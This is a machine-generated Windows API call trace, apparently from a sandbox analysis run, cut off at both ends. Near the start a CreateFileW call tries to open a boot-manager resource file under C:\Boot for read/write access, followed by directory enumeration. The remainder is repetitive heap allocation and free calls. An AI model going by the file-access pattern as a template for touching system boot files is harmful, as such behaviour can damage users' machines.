(pszPath="C:\\Boot\\nb-NO\\bootmgr.exe.mui") returned=".mui" [0179.283] CreateFileW (lpFileName="C:\\Boot\\nb-NO\\bootmgr.exe.mui" (normalized: "c:\\boot\\nb-no\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0179.284] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f2d0 | out: hHeap=0x6a0000) returned 1 [0179.284] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xea212efb, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15850, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0179.285] FindClose (in: hFindFile=0x2cbfa10 | out: hFindFile=0x2cbfa10) returned 1 [0179.285] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.285] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fe0 | out: hHeap=0x6a0000) returned 1 [0179.285] PeekMessageW (in: lpMsg=0x30fff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fff08) returned 0 [0179.285] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fe0 [0179.285] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0179.285] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.285] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.286] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.286] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.286] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.286] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.286] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.287] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.287] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.287] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.287] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.288] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.288] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.288] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.288] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.288] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.288] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.288] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.289] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.289] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.289] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.289] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0179.289] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.290] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.290] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.290] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.290] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0179.290] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.290] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.291] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.291] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.291] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.291] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.291] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.291] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.291] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0179.292] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.292] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.292] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.292] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0179.292] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.292] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.292] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.292] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0179.293] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.293] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.293] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.293] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.293] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.294] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.294] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.294] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.294] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.294] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.294] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.294] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0179.294] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.295] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.295] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.295] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0179.295] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.295] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.296] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.296] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.296] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.296] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.296] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.296] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.296] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.297] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.297] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.297] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.297] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.297] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.297] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.297] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.298] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.298] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.298] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.298] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.298] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.298] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.298] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.299] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.299] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.299] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.299] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.299] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.299] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.300] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.300] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.300] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.300] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0179.300] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.300] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.301] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.301] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.301] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.301] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.301] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.301] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.301] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.301] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0179.302] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.302] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.302] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.302] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.302] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0179.302] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.303] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.303] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.303] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0179.303] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.304] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.304] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.304] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.304] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.304] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.304] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.304] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.305] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.305] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.305] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.305] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.305] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0179.305] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.305] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.306] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.306] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.306] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0179.306] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.306] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.306] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.306] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0179.307] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.307] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.307] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.307] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.307] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.307] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.307] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.307] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.308] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.308] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.308] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.308] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.308] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.309] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.309] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.309] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.309] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.309] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.309] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.309] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.310] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.310] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.310] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.310] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.310] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.310] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.310] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.310] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.311] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.311] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.311] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.311] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.311] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0179.311] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.312] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.312] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.312] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.312] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.312] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.312] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.312] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.312] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0179.313] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.313] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.313] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.313] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0179.313] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.314] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.314] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.314] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.314] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.314] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.314] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.314] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.314] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.315] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.315] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.315] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.315] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0179.315] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.315] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.316] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.316] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.316] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0179.316] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.316] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.316] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.316] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0179.317] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.317] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.317] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.317] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.317] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.317] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.317] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.317] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.318] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.318] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.318] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.318] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.318] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.319] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.319] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.319] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.319] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.319] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.319] RtlAllocateHeap (HeapHandle=0x6a0000, 